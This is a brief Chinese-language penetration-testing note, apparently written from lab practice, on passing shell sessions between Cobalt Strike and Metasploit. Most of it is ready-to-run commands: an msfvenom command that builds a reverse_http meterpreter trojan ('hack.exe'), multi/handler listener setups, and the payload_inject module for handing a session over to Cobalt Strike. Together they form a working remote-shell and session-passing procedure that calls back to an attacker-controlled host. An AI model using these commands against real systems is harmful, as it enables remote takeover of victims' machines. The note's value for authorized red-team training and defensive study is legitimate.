在shell模式下,输入chcp 65001可以解决乱码
cs传shell给msf
首先就是正常的靶机上线cs

然后生成一个foreign的监听器

在msf上设置监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set lhost 192.168.111.128
set lport 6666
run

选择刚刚新建的msf监听器
msf已经接收到shell

msf传shell给cs
首先先是msf获得shell
先生成对应的木马,设置对应的监听,把木马上传到目标机器并且执行,msf就获得了shell
msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.111.128 lport=5555 -f exe > hack.exe

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set lhost 192.168.111.128
set lport 5555
run

cs上设置监听

拿到meterpreter之后先background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.111.128
set lport 7777
set session 3
set disablepayloadhandler true
exploit -j

再回到cs,发现主机就已经上线了

msf和cs的shell互不影响